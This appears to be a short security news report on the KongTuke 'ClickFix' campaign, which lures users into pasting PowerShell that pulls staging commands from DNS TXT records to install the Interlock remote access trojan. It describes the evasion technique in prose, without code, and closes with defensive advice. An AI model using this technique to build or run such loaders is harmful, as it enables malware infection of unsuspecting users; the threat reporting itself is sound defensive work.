ClickFix Script Uses DNS TXT Records to Run PowerShell Commands

The KongTuke campaign has evolved, presenting a sophisticated new threat to the cybersecurity landscape. Active since mid-2025, this threat actor group consistently refines its techniques to bypass conventional enterprise security filters.

Their primary weapon remains the “ClickFix” strategy, a social engineering vector that deceives unsuspecting users into manually fixing simulated website errors.

In these attacks, victims encounter fake browser glitches or verification captchas on compromised legitimate websites.

Deceptive instructions prompt them to copy a malicious script and paste it directly into the Windows Run dialog or a PowerShell terminal.

This “self-infection” method effectively bypasses automated download protections by leveraging the user’s own system privileges to execute unauthorized code.

However, a significant escalation in technical tradecraft has recently surfaced. Unit 42 analysts identified that the latest KongTuke iterations now employ DNS TXT records to stealthily mask their next stage.

Instead of reaching out to a flagged web server via HTTP, the initial script queries a legitimate-looking domain’s DNS records to retrieve malicious staging instructions from the record.

This method significantly complicates detection for defenders relying on standard HTTP traffic analysis.

By embedding the payload within DNS responses, attackers seamlessly blend their malicious traffic with the constant background noise of internet resolution.

The ultimate goal remains the deployment of severe malware, often leading to the installation of the Interlock remote access trojan or other persistent threats within the network.

Mechanism of DNS TXT Staging

The technical innovation lies in the payload retrieval mechanism. When the victim executes the initial ClickFix snippet, it does not immediately download a file.

Instead, it triggers a PowerShell command that performs a DNS lookup for a specific TXT record.

These records, normally designed to hold text information for domain verification, contain the staged command string needed to fetch and execute the final payload.

Security controls often permit DNS traffic freely to ensure connectivity, creating a dangerous blind spot.

The script parses the text from the DNS response and executes it in memory, leaving minimal traces on the disk.

This “fileless” retrieval allows the KongTuke campaign to maintain a low profile while establishing persistence on compromised endpoints.

Recommendations include blocking newly registered domains, validating DNS traffic for anomalies, and strictly monitoring PowerShell execution logs for suspicious DNS lookup commands.​

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.